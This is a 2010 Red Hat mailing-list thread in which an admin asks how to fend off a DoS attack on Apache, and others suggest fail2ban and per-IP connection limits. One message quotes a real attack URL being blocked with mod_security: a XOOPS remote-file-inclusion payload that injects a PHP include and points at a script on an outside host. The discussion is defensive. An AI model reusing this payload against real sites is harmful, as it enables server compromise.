VS: Re: how to protect an apache from a DOS Attack



There should be possibility limit connections at the same time. For example you should be able limit conneçtions how many connections can be taken at the same time on that specific web server from same IP-address. There should be sections on httpd.conf file, which you could be used to limit connections to the same web server at the same time. Please check that configuration.


-----Original Message-----
From: ESGLinux
Sent: 4/12/2010 5:16:49 PM
To: General Red Hat Linux discussion list
Subject: Re: how to protect an apache from a DOS Attack
Hi again

I have experimented with mod_security to ban access to urls like this:
/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=
http://www.hongkongtravel.co.kr/you4/data/byz9991.txt???

but I don?t know if there is a way to use it to limit the number of access
from a ip in period of time,

anyone knows?

ESG

2010/4/12 <m.roth@xxxxxxxxx>

ESG wrote:

I have an apache web server and I having a DOS Attack. Which is the best
way to protect my webserver from it. ?

What I do now is when I detect the problem I use an iptable rule to ban
the ip, but I want to do it automatically without manual intervention,

Any idea or suggestion?

fail2ban

mark

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list